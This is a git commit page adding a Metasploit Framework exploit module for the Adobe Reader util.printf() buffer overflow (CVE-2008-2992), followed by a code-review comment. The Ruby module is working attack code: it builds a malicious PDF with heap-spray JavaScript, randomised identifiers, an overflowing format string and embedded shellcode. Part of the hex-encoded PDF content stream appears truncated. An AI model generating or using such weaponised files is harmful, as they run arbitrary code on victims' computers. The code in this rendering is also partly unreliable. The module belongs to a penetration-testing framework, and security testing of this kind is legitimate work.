added exploit module adobe_utilprintf.rb
git-svn-id: file:///home/svn/framework3/trunk@5995 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
a8c9397419
commit
381f6da682
|
@ -0,0 +1,163 @@
|
|||
###
|
||||
## This file is part of the Metasploit Framework and may be subject to
|
||||
## redistribution and commercial restrictions. Please see the Metasploit
|
||||
## Framework web site for more information on licensing and terms of use.
|
||||
## http://metasploit.com/projects/Framework/
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe util.printf() Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
|
||||
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
|
||||
entry, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2008-2992' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Adobe Reader v8.1.2', { 'Ret' => '' } ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 8 2008',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Make some nops
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Randomize PDF version?
|
||||
ver = 1 + rand(2)
|
||||
|
||||
build = 1 + rand(7)
|
||||
|
||||
x = ver.to_s + "." + build.to_s
|
||||
|
||||
# Randomize variables
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
rand9 = rand_text_alpha(rand(100) + 1)
|
||||
rand10 = rand_text_alpha(rand(100) + 1)
|
||||
rand11 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
script = %Q|
|
||||
var #{rand1} = unescape("#{shellcode}");
|
||||
var #{rand2} ="";
|
||||
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
|
||||
#{rand4} = #{rand2} + #{rand1};
|
||||
#{rand5} = unescape("#{nops}");
|
||||
#{rand6} = 20;
|
||||
#{rand7} = #{rand6}+#{rand4}.length
|
||||
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
|
||||
#{rand8} = #{rand5}.substring(0, #{rand7});
|
||||
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
|
||||
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
|
||||
#{rand10} = new Array();
|
||||
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
|
||||
util.printf("%45000.45000f", 0);
|
||||
|
|
||||
|
||||
# Create the pdf
|
||||
pdf = "\x25\x50\x44\x46\x2d" + x + "\x0a\x0a\x31\x20\x30\x20\x6f\x62"
|
||||
pdf << "\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x43\x61\x74"
|
||||
pdf << "\x61\x6c\x6f\x67\x0a\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20"
|
||||
pdf << "\x32\x20\x30\x20\x52\x0a\x20\x2f\x50\x61\x67\x65\x73\x20\x33\x20"
|
||||
pdf << "\x30\x20\x52\x0a\x20\x2f\x4f\x70\x65\x6e\x41\x63\x74\x69\x6f\x6e"
|
||||
pdf << "\x20\x37\x20\x30\x20\x52\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a"
|
||||
pdf << "\x0a\x0a\x32\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54"
|
||||
pdf << "\x79\x70\x65\x20\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x0a\x20\x2f"
|
||||
pdf << "\x43\x6f\x75\x6e\x74\x20\x30\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62"
|
||||
pdf << "\x6a\x0a\x0a\x33\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f"
|
||||
pdf << "\x54\x79\x70\x65\x20\x2f\x50\x61\x67\x65\x73\x0a\x20\x2f\x4b\x69"
|
||||
pdf << "\x64\x73\x20\x5b\x34\x20\x30\x20\x52\x5d\x0a\x20\x2f\x43\x6f\x75"
|
||||
pdf << "\x6e\x74\x20\x31\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
||||
pdf << "\x34\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70"
|
||||
pdf << "\x65\x20\x2f\x50\x61\x67\x65\x0a\x20\x2f\x50\x61\x72\x65\x6e\x74"
|
||||
pdf << "\x20\x33\x20\x30\x20\x52\x0a\x20\x2f\x4d\x65\x64\x69\x61\x42\x6f"
|
||||
pdf << "\x78\x20\x5b\x30\x20\x30\x20\x36\x31\x32\x20\x37\x39\x32\x5d\x0a"
|
||||
pdf << "\x20\x2f\x43\x6f\x6e\x74\x65\x6e\x74\x73\x20\x35\x20\x30\x20\x52"
|
||||
pdf << "\x0a\x20\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x20\x3c\x3c\x0a"
|
||||
pdf << "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x50\x72"
|
||||
pdf << "\x6f\x63\x53\x65\x74\x20\x5b\x2f\x50\x44\x46\x20\x2f\x54\x65\x78"
|
||||
pdf << "\x74\x5d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
||||
pdf << "\x2f\x46\x6f\x6e\x74\x20\x3c\x3c\x20\x2f\x46\x31\x20\x36\x20\x30"
|
||||
pdf << "\x20\x52\x20\x3e\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
|
||||
pdf << "\x20\x20\x3e\x3e\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a"
|
||||
pdf << "\x35\x20\x30\x20\x6f\x62\x6a\x0a\x3c\x3c\x20\x2f\x4c\x65\x6e\x67"
|
||||
pdf << "\x74\x68\x20\x35\x36\x20\x3e\x3e\x0a\x73\x74\x72\x65\x61\x6d\x0a"
|
||||
pdf << "\x42\x54\x20\x2f\x46\x31\x20\x31\x32\x20\x54\x66\x20\x31\x30\x30"
|
||||
pdf << "\x20\x37\x30\x30\x20\x54\x64\x20\x31\x35\x20\x54\x4c\x20\x28"
|
||||
pdf << "\x65"
|
||||
pdf << "\x61\x6d\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x36\x20\x30\x20\x6f"
|
||||
pdf << "\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f\x46\x6f"
|
||||
pdf << "\x6e\x74\x0a\x20\x2f\x53\x75\x62\x74\x79\x70\x65\x20\x2f\x54\x79"
|
||||
pdf << "\x70\x65\x31\x0a\x20\x2f\x4e\x61\x6d\x65\x20\x2f\x46\x31\x0a\x20"
|
||||
pdf << "\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x20\x2f\x48\x65\x6c\x76\x65"
|
||||
pdf << "\x74\x69\x63\x61\x0a\x20\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20"
|
||||
pdf << "\x2f\x4d\x61\x63\x52\x6f\x6d\x61\x6e\x45\x6e\x63\x6f\x64\x69\x6e"
|
||||
pdf << "\x67\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x37\x20\x30"
|
||||
pdf << "\x20\x6f\x62\x6a\x0a\x3c\x3c\x0a\x20\x2f\x54\x79\x70\x65\x20\x2f"
|
||||
pdf << "\x41\x63\x74\x69\x6f\x6e\x0a\x20\x2f\x53\x20\x2f\x4a\x61\x76\x61"
|
||||
pdf << "\x53\x63\x72\x69\x70\x74\x0a\x20\x2f\x4a\x53\x20\x28"
|
||||
pdf << script
|
||||
pdf << "\x0a\x0a\x0a"
|
||||
pdf << "\x29\x0a\x3e\x3e\x0a\x65\x6e\x64\x6f\x62\x6a\x0a\x0a\x78\x72\x65"
|
||||
pdf << "\x66\x0a\x30\x20\x38\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
|
||||
pdf << "\x20\x36\x35\x35\x33\x35\x20\x66\x0a\x30\x30\x30\x30\x30\x30\x30"
|
||||
pdf << "\x30\x31\x30\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30"
|
||||
pdf << "\x30\x30\x30\x30\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30"
|
||||
pdf << "\x30\x30\x30\x30\x30\x30\x31\x34\x37\x20\x30\x30\x30\x30\x30\x20"
|
||||
pdf << "\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x32\x30\x38\x20\x30\x30\x30"
|
||||
pdf << "\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x34\x30\x30\x20"
|
||||
pdf << "\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30\x30\x30\x35"
|
||||
pdf << "\x30\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x30\x30\x30\x30\x30"
|
||||
pdf << "\x30\x30\x36\x32\x31\x20\x30\x30\x30\x30\x30\x20\x6e\x0a\x74\x72"
|
||||
pdf << "\x61\x69\x6c\x65\x72\x0a\x3c\x3c\x0a\x20\x2f\x53\x69\x7a\x65\x20"
|
||||
pdf << "\x38\x0a\x20\x2f\x52\x6f\x6f\x74\x20\x31\x20\x30\x20\x52\x0a\x3e"
|
||||
pdf << "\x3e\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a\x33\x36\x32\x39"
|
||||
pdf << "\x0a\x25\x25\x45\x4f\x46\x0a"
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
|
||||
end
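Review bot: The PDF header version is built from `ver = 1 + rand(2)`, so half of the generated files begin with `%PDF-2.x`, a major version that did not exist for the Reader builds this targets and that strict parsers may reject or flag; only the minor digit should vary, e.g. `x = "1.#{1 + rand(7)}"` (the `build` variable is otherwise fine). The `xref` entries and `startxref` (`3629`) are hard-coded byte offsets, yet object 7's length changes on every run because the eleven identifiers are `rand_text_alpha(rand(100) + 1)` and the payload length varies, so the cross-reference table is always stale and the exploit silently depends on Reader's damaged-file recovery; a comment such as `# xref offsets are stale by design: Reader rebuilds the table, other parsers may not` above the `xref` bytes would save the next maintainer a debugging session. The `'Ret' => ''` target value is never referenced (the exploit is a pure heap spray followed by `util.printf`), so it should be removed or documented as unused. The description string reads "that a contains malformed util.printf()" and should be "that contains a malformed util.printf()". The content stream around `pdf << "\x65"` appears truncated in this rendering (object 5 declares `/Length 56` but no `Tj`/`ET`/`endstream` bytes follow), so that region should be checked against the committed file rather than this page.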
|